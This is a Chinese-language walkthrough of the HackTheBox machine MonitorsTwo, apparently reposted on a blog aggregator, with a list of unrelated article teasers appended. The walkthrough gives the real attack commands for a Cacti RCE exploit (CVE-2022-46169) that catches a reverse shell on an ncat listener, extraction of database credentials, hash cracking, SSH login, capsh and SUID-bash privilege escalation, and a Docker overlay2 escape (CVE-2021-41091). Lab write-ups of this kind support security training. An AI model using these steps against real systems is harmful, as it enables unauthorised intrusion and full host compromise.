HackTheBox-Machines--MonitorsTwo

文章目录

  • 0x01 信息收集
  • 0x02 CVE-2022-46169 漏洞利用
  • 0x03 权限提升
  • 0x04 提升到root权限

MonitorsTwo 测试过程


0x01 信息收集


   a.端口扫描: 发现22、80端口
   b.信息收集: 1.2.22 Cacti信息收集

nmap -sC -sV 10.129.186.132

在这里插入图片描述

  1.访问 10.129.186.132,为 1.2.22 Cacti 框架的登录页面

在这里插入图片描述

  2.搜索 1.2.22 Cacti 信息,发现在1.2.22版本存在RCE漏洞,编号: CVE-2022-46169

在这里插入图片描述

  CVE-2022-46169 exploit地址https://www.exploit-db.com/exploits/51166

0x02 CVE-2022-46169 漏洞利用


# 设置监听
ncat -lnvp 4444
python3 CVE-2022-46169-CACTI.py -u http://10.129.186.132/ --LHOST=10.10.14.150 --LPORT=4444

在这里插入图片描述

  获取到www-data权限

在这里插入图片描述

0x03 权限提升


  1.主机名为随机的十六进制,猜测可能为docker容器,查看根目录是否有docker配置文件发现.dockernv守护进程配置文件确认为docker容器

在这里插入图片描述

  2.查看 web 目录,检查include/config.php配置文件
在这里插入图片描述

在这里插入图片描述

  发现mysql数据库运行主机、默认数据库、用户名、密码

在这里插入图片描述

  3.数据库连接

mysql -h db -u root -proot cacti

在这里插入图片描述

show tables;

在这里插入图片描述

describe user_auth;

在这里插入图片描述

select username,password from user_auth;

在这里插入图片描述

  4.使用john工具破解hash密码

  获取到账号密码 marcus:funkymonkey
在这里插入图片描述

  5.ssh登录

ssh marcus@10.129.186.132 

在这里插入图片描述

0x04 提升到root权限


# 未发现可利用
sudo -l
find / -type f -perm -4000 2>/dev/null
uname -a 

在这里插入图片描述

  1.检查docker版本,发现 docker version 20.10.5+dfsg1

docker --version

在这里插入图片描述

  2.搜索docker version 20.10.5 版本相关信息,发现存在漏洞: CVE-2021-41091

在这里插入图片描述

  3.CVE-2021-41091漏洞利用

  找到相关漏洞利用资料https://exploit-notes.hdks.org/exploit/container/docker/moby-docker-engine-privesc/

1> 找到容器挂载目录:

findmnt

在这里插入图片描述

2> 发现两个容器正在运行: 确定哪一个50bca5e748b0容器

# 执行失败
ls /var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged/var/www/html
# 执行成功,确定此为Cacti容器
ls /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged/var/www/html

在这里插入图片描述

3> 在容器中准备SUID二进制文件

  设置suid二进制文件需要root权限,我们此时权限为www-data权限。

4> 将www-data 提升至 root权限

#检查二进制文件
find / -perm /4000 2>/dev/null

在这里插入图片描述

  利用capsh进行提权

capsh --gid=0 --uid=0 --

在这里插入图片描述

5> 重新设置suid二进制文件

chmod u+s /bin/bash

在这里插入图片描述

6> 在真实主机中执行 SUID 二进制文件

挂载目录/bin/bash -p
/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged/bin/bash -p

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/813936.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

社交革命的引领者:探索Facebook的创新策略

1. 引言:社交媒体的崛起 社交媒体的兴起标志着信息时代的到来,它不仅改变了人们的生活方式,也影响着整个社会结构。作为社交媒体的先驱者,Facebook以其创新的策略和领先的技术,成为了这场社交革命的引领者。从2004年马…

如何通过drissionpage以及js逆向过字符/滑块/点选/九宫格验证码文章/视频学习案例

目录 零、各种关于drissionpage文章视频案例解决方案合集一、过字符类验证码反爬实战(自动化和逆向两种解法)二、过滑块类验证码反爬实战(自动化和逆向两种解法)三、过点选类验证码反爬实战(自动化和逆向两种解法)四、过九宫格验证码反爬实战(自动化和逆向两种解法)仅供…

itop4412编译内核时garbage following instruction -- `dmb ish‘ 解决方案

王德法 没人指导的学习路上磕磕绊绊太耗费时间了 今天编译4412开发板源码时报 garbage following instruction – dmb ish’ 以下是解决方案: 1.更新编译器 sudo apt-get install gcc-arm-linux-gnueabi 更新后修改Makefile 中编译器路径如下图 2.你以为更新完就可…

[iOS]进程-线程-队列-任务

一、进程(Process) 在 iOS 开发中,进程是一个基本的概念,虽然通常作为开发者,你不需要像在某些其他操作系统那样进行直接的进程管理,因为 iOS 提供了很多高级别的抽象。不过,了解进程的概念对于…

SqlServer功能性配置选择

功能性配置 下面的是必选的

传输层协议——UDP/TCP协议

目录 端口号 端口号范围 pidof UDP协议 UDP协议格式 UDP特点 UDP缓冲区 UDP的注意事项 基于UDP的应用层协议 TCP协议 TCP协议格式 序号与确认序号 窗口大小 6个标记位 紧急指针 确认应答机制 连接管理机制 三次握手 四次挥手 超时重传机制 流量控制 滑动…

【计算机网络】ip子网划分--超详细例题解析

Hello!这一篇主要是计算机网络中的ip地址子网划分的例题,这里例举了四个题型。保证即便从0也可以掌握!(前面是一些预备知识,不熟悉的小伙伴一定要看下学习下哦~) 这也是博主的学习过程,做题中仅仅我的理解哦。若文章中…

vue开发工具和开发环境,测试环境等

Vue.js 的开发主要依赖于一些核心的工具和技术,它们共同构建了一个强大的开发环境,使开发者能够高效地创建和管理 Vue 应用程序。以下是一些主要的 Vue.js 开发工具和资源: 文本编辑器:如 Visual Studio Code (VS Code)&#xff…

Unity之C#面试题(二)

内容将会持续更新,有错误的地方欢迎指正,谢谢! Unity之C#面试题(二) TechX 坚持将创新的科技带给世界! 拥有更好的学习体验 —— 不断努力,不断进步,不断探索 TechX —— 心探索、心进取&a…

langchain 文本向量化存储,并检索相似 topK

目录 chroma 检索 faiss 检索 检索器 相似性 最大相关性mmr 相似数阈值 txt 有多行,我的这份数据有 67 行,样例如下: 字段1\t值1\n 字段2\t值2\n ... chroma 检索 pip install langchain-chroma 在本地下载了 embedding 模型&…

SpringBoot 集成H2数据库,启动执行sql, 中文乱码

目录 H2数据库介绍 SpringBoot版本:SpringBoot 2.1.12.RELEASE 快速集成H2,maven依赖 快速集成H2,数据源及关键参数配置 spring.datasource.schema参数(建表SQL脚本) spring.datasource.data参数(更新、…

深入探索Linux中的libgdbus:GDBus库的应用和实现

引言 在Linux系统中,DBus是一种高效的进程间通信(IPC)机制,广泛应用于桌面环境和系统服务之间的通信。GDBus是基于GLib库的DBus实现,作为libgdbus的一部分提供。它旨在提供一种简洁、高效的方式来实现DBus通信。通过深…

cocos2dx4.0 vs编译报错

1.版本 vs2017cocos 4.0 2.问题 不知道为什么编译运行cocos项目的时候报错了 错误信息如下: 15> 已完成执行任务“GetOutOfDateItems”的操作。 15> 由于 false 条件,已跳过任务“ParallelCustomBuild”;(‘(_ParallelCustomBuild)’…

vue3-element-admin二次开发遇到的问题总结,持续更新中

vue3-element-admin 是基于 Vue3 Vite5 TypeScript5 Element-Plus Pinia 等主流技术栈构建的免费开源的后台管理前端模板(配套后端源码)。 一、定制Element-Plus主题 1.创建 variables.scss 变量文件 /*variables.scss*/ /*覆盖element-plus变量*/…

前端面试复习大纲

在准备前端面试时,以下是一些可能会被问到的题目类型和概念,可以根据这些内容进行复习和准备: HTML/CSS基础 HTML5的新特性CSS盒模型响应式设计Flex布局和Grid布局浮动和定位CSS预处理器(如Sass、Less) JavaScript基础…

Golang | Leetcode Golang题解之第19题删除链表的倒数第N个结点

题目&#xff1a; 题解&#xff1a; func removeNthFromEnd(head *ListNode, n int) *ListNode {dummy : &ListNode{0, head}first, second : head, dummyfor i : 0; i < n; i {first first.Next}for ; first ! nil; first first.Next {second second.Next}second.N…

代码随想录算法训练营第三十六天|435. 无重叠区间、763.划分字母区间、56.合并区间

贪心 文章目录 一、无重叠区间二、划分字母区间三、合并区间总结 一、无重叠区间 求移除重叠区间&#xff0c;等于所有区间减去重叠区间&#xff0c;也就是重叠空间个数 class Solution { public:static bool cmp (vector<int>& a, vector<int>& b) {ret…

Nacos-默认token.secret.key-配置不当权限绕过漏洞复现

漏洞描述&#xff1a; Nacos 身份认证绕过漏洞(QVD-2023-6271)&#xff0c;开源服务管理平台 Nacos在默认配置下未对 token.secret.key 进行修改&#xff0c;导致远程攻击者可以绕过密钥认证进入后台&#xff0c;造成系统受控等后果。 漏洞信息 公开时间&#xff1a;2023-03…

MYSQL原理学习篇简记(五)

&#x1f44f;作者简介&#xff1a;大家好&#xff0c;我是小周同志&#xff0c;25届双非校招生Java选手&#xff0c;很高兴认识大家 &#x1f4d5;学习出处&#xff1a;本文是学自小林coding (xiaolincoding.com) 网站的MYSQL图解篇 &#x1f525;如果感觉博主的文章还不错的…

11 Php学习:函数

PHP 内建函数Array 函数 PHP Array 函数是 PHP 核心的组成部分。无需安装即可使用这些函数。 创建 PHP 函数 当您需要在 PHP 中封装一段可重复使用的代码块时&#xff0c;可以使用函数。下面详细解释如何创建 PHP 函数并举例说明。 创建 PHP 函数的语法 PHP 函数的基…